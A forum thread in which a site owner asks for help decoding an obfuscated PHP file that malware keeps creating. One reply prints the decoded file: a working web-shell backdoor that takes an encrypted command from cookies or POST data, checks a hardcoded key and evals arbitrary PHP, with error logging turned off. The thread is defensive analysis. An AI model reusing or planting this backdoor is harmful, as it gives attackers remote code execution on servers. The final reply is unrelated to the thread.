Any options to decrypt this php?

M

Motorkaa2017-03-21 10:57:43

PHP

Motorkaa, 2017-03-21 10:57:43

Some virus on the site constantly creates 2 files and starts spamming wildly. Who creates this case and how it is impossible to establish. So I'm wondering if deciphering this case would help? Prompt as or than it is possible to result it in a readable form.
They are big, I couldn't post them here.
1st file.
hello-site.ru/share/Strannyj-kod I
didn’t fit in there either, it ends like this:

'3DX13HmvKmDXuZB';
$djrxvctcq = Array('1'=>'D', '0'=>'1', '3'=>'Q', '2'=>'u', '5'=>'9', '4'=>'L', '7'=>'j', '6'=>'a', '9'=>'8', '8'=>'t', 'A'=>'f', 'C'=>'g', 'B'=>'7', 'E'=>'i', 'D'=>'0', 'G'=>'A', 'F'=>'n', 'I'=>'r', 'H'=>'p', 'K'=>'G', 'J'=>'b', 'M'=>'T', 'L'=>'2', 'O'=>'X', 'N'=>'v', 'Q'=>'m', 'P'=>'3', 'S'=>'J', 'R'=>'c', 'U'=>'E', 'T'=>'x', 'W'=>'o', 'V'=>'O', 'Y'=>'N', 'X'=>'K', 'Z'=>'k', 'a'=>'Y', 'c'=>'P', 'b'=>'w', 'e'=>'R', 'd'=>'d', 'g'=>'U', 'f'=>'Z', 'i'=>'W', 'h'=>'h', 'k'=>'6', 'j'=>'I', 'm'=>'l', 'l'=>'H', 'o'=>'V', 'n'=>'q', 'q'=>'B', 'p'=>'z', 's'=>'s', 'r'=>'5', 'u'=>'C', 't'=>'S', 'w'=>'M', 'v'=>'e', 'y'=>'F', 'x'=>'y', 'z'=>'4');
eval/*txilqla*/(omspplru($czbetc, $djrxvctcq));?>

2nd file.
hello-site.ru/share/Strannyj-kod2

Reply

Answer the question

In order to leave comments, you need to log in

5 answer(s)

P

Pavel, 2017-03-21
@Motorkaa

pastebin.com/uNfLxXCu
ps. the script is not complete, because you yourself gave a broken source

R

Rou1997, 2017-03-21
@Rou1997

If, excuse me, they are shitting in the entrance, then you need to do a fecal analysis, well, we will do it "and you will see it there", or do you still need to install a combination lock?
Probably, this is not a virus on the site, but a bot that exploits a shell-type vulnerability, that is, there is no “propagation” itself in this code, well, it originally came from somewhere, which means that there is still a “hole”, and if if you haven’t removed it yet, then it hasn’t disappeared by itself, it’s still there and can be used ...
And if it makes sense to analyze the code, then in addition to deobfuscation, debugging is always needed, without it, the analysis time grows exponentially with size code and encryption, so learn how to debug PHP.

M

Motorkaa, 2017-03-21
@Motorkaa

eval changed to echo and saw everything.
But how to find what creates?
Is it possible to see who and how created the file?

R

Rsa97, 2017-03-21
@Rsa97

The first script accepts an encrypted command via $_COOKIES or $_POST and returns the result of its execution.

<?php
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);

$command = NULL;
$pass = NULL;

global $globalKey = 'cfa57343-5fb2-4c08-95bc-c0e9c5972f14';

function decode($str, $key)
{
    $result = "";

    for ($i = 0; $i < strlen($str);)
    {
        for ($j = 0; $j < strlen($key) && $i < strlen($str); $j++, $i++)
        {
            $result .= chr(ord($str[$i]) ^ ord($key[$j]));
        }
    }

    return $result;
}

function decode2($str, $key)
{
    global $globalKey;

    return decode(decode($str, $globalKey), $key);
}

foreach ($_COOKIE as $name => $value)
{
    $command = $value;
    $pass = $name;
}
 
if (!$command)
{
    foreach ($_POST as $name => $value)
    {
        $command = $value;
        $pass = $name;
    }
}

$command = @unserialize(decode2(base64_decode($command), $pass));
if (isset($command['ak']) && $globalKey == $command['ak'])
{
    if ($command['a'] == 'i')
    {
        $versions = Array(
            'pv' => @phpversion(),
            'sv' => '1.0-1',
        );
        echo @serialize($versions);
    }
    elseif ($command['a'] == 'e')
    {
        eval($command['d']);
    }
    exit();
}

M

MyMac, 2018-01-19
@MyMac

No JavaScript errors in the console?
Is the form itself being submitted?